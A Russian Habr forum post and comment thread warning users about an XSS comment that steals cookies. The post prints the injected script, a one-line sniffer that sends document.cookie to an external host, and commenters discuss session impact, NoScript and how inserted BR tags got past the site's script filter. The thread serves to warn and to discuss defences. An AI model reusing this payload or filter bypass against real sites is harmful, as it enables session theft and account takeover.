Внимание, воровство cookies!

    В недавно опубликованном посте Однокласникис.инфо (не кликай, пока не дочитаешь) хабраюзер grg391 запостил комментарий со вложенным javascript'ом:

    хабрахабр опасносте

    Из-за этого комментария все комментарии после него не отображаются.

    Содержание скрипта «bestrussianporn.ru/s.js»:
    img = new Image(); img.src = "http://s.netsec.ru/gojas.gif?"+document.cookie;
    Т. е. это sniffer ваших cookies, будьте осторожны, если вы при авторизации отмечали чекбокс «не привязыватьтся к IP-адресу» злоумышленник может завладеть вашим аккаунтом.

    Рекомендуется сменить пароль.
    AdBlock has stolen the banner, but banners are not teeth — they will be back

    More
    Ads

    Comments 64

      0
      Не подскажете, он крадет только хабровский кукис или вообще все?
      • UFO just landed and posted this here
          0
          document.cookie возвращает cookie только для страницы, с которой он был вызван — соответственно, только для хабра.
            0
            А это будет работать на всех системах ?
            • UFO just landed and posted this here
          0
          konfuze, спасибо за заметку! Но лучше это все было сначала отправить админам, чтобы не высплыло тут еще умников.
            +4
            старую дыру не залатали
              0
              надо сверху там гденибудь в тредах добавить скрипт останавливающий последующее исполнение скриптов.. или попробовать вверху к тредам написать <noscript> а ниже того коммента закрыть тэг-
              </noscript>
                0
                это для другого, это скроет все что внутри пока не отключишь javascript
                  0
                  прежде чем минус ставить почитай http://www.htmlbook.ru/html/noscript.html
                    0
                    ой, это про тот топик конкретно было,
                    тогда мой косяк, согласен
                • UFO just landed and posted this here
                  0
                  Парсер с тех пор немного пофиксили, но, как мы видим, не до конца.
                  +3
                  viva la noscript!
                    0
                    А теперь посмотрите во что парсер превратил ваш линк )
                      +3
                      Вот ссылка получше (парсер — лох!) : NoScript.
                      +1
                      Перекладывай в коллективный блог.
                        +1
                        В ту же самую информационную безопасность. Тогда этот пост гарантированно появится на главной (при текущем рейтинге).
                        0
                        >Рекомендуется сменить пароль.
                        Да достаточно перелогиниться, т.к. злоумышленник не сможет сменить пароль - для этого необходимо знать старый пароль. В общем, аккаунт не украдут, но личной информацией могут воспользоваться.
                          0
                          Просто перелогиниться не поможет - хэш не меняется при новом логине, но пароль да, сменить не смогут.

                          Обычно в таких случаях советую сменить пароль, т. к. в хэшем из кук может быть md5-хэш от пароля (к хабру это не относится), а это уже один шаг к получению пароля. В теории, конечно.
                            0
                            Да, верное замечание. Я думал на хабре в куках сессия. Ан нет, там хеш от пароля, скорее всего соленый md5.
                            0
                            Будешь не зная прокачивать какого-нить виртуала с очередным PR на главную.
                            –11
                            пойду поищу какой-то сайт похожий на хабр но из *.ua и безопасней, т.к. тупо каждый комент менять пароль
                              –3
                              Тупо уходить с интересного и хорошего сайта, только из-за того что вы не внимательный, и слишком наивный и доверчивый)
                              Вот вам мой сказ)
                              0
                              Опять gojas шалит.. он уже реально запарил.
                              • UFO just landed and posted this here
                                  –27
                                    +5
                                    Нет, ваш xss не сработал.
                                    +9
                                    я в шоке. похоже на хабр стоит ходить через текстовый браузер ))
                                    • UFO just landed and posted this here
                                        0
                                        Какая разница какой пароль. Он все арвно захеширован, и я думаю посолен.
                                        +38
                                        капец, гребаный хабр. Его что, совсем через задницу писали? Как можно допускать такие дырени в безопасности? накипело
                                          +2
                                          Да, это позор, пожалуй.
                                          0
                                          Отпустило. Прилетело НЛО и почикало скрипт.
                                            0
                                            у нас на babyblog та же фигня вылезла. Заткнули дыру со скриптом - все ок
                                            • UFO just landed and posted this here
                                                0
                                                Альт у картинки глянь ;)
                                                  0
                                                  Теги глянь :)
                                                  • UFO just landed and posted this here
                                                    • UFO just landed and posted this here
                                                +9
                                                Украдите у меня эккаунт навсегда плиз, чтоб я больше никогда не заходил на хабр.
                                                  0
                                                  и без него можно читать топики. только без аккаунта не возможно будет комментировать что-то.
                                                  0
                                                  У меня KIS 2009 beta сразу сказал что в том топике фишинг атака.

                                                  Вы еще не видели логов серверов сегодня (не хабра конечно, я про свой): объявился бот с юзер- агентом libwww-perl/5.805 и libwww-perl/5.65 вот тот генерит офигетельный xss, когда попробовал посмотреть что же там за урлы, каспер взбунтовался не нашутку... пришлось даже FF из его блек-листа вытаскивать.
                                                    0
                                                    как у KIS 2009 из нагрузкой на систему?..

                                                    (сори за оффтоп. просто у меня Norton 360, но я не очень сильно им доволен...)
                                                      0
                                                      Я думаю что вот эта статья ответит на Ваш вопрос. В KIS 2009 ресурсопотребление еще немного меньше
                                                    0
                                                    как удалось вставить скрипт? парсер же режит всё со словом script, из-за чего многие линки не работают.
                                                      +1
                                                      там хитровставленные BR-ы
                                                        0
                                                        как видим, не все он режет :)
                                                        0
                                                        я надеюсь этому хабраюзеру все уже нагадили в карму? :)
                                                          +1
                                                          это бесполезно. сегдня таких зарегилось уже несколько штук, прокачали им карму и поюзали.
                                                          впринципе если сейчас грамотно использовать те куки, можно наладить продажу спама на главной хабра. только многим это будет уже неинтересно.
                                                            –1
                                                            это фигня, интересно на лепре такая дырка есть? :) можно ж озолотиться %)
                                                              +4
                                                              лепры нету, %username% :-)
                                                        • UFO just landed and posted this here
                                                            +2
                                                            Стрелять-колотить, ты наверное ни разу ни одной ошибки в коде не допустил.
                                                            0
                                                            Я этот топик не смотрел, но вчера заметил такую фигню. Почитал что пишут на хабре - ушел поработать, пришел - а тут в новых топиках кол-во комментарий пишется, типа 23+16. Следовательно хабр посчитал, что я его читал уже, но я этого не делал..
                                                            Сменил пароль.

                                                            У кого-то было подобное? Это глюк с комментариями на хабре или все же жулики?
                                                              –4
                                                                +1
                                                                что то мне сыкотно 0_0
                                                                  0
                                                                  хуясе.... я этого не писал вообще оО
                                                                  0
                                                                  :)
                                                                  • UFO just landed and posted this here
                                                                      0
                                                                      неужто соблазн велик?) Мне конечно интересно что там по ссылке но перспектива менять после этого пароль меня не прельщает)
                                                                    • UFO just landed and posted this here
                                                                        0
                                                                        Да, багу не пофиксили, а a9V зареган аж в 2007 году - вот и жертва вчерашнего бага.
                                                                        0
                                                                        В топике про вконтакт и оперу такая же хрень.
                                                                        Я героически заминусовала его до неотображения, но это просто дисплейнан, и скрипт всё равно подгружается=(

                                                                        А администрация опять спит, да?

                                                                        Only users with full accounts can post comments. Log in, please.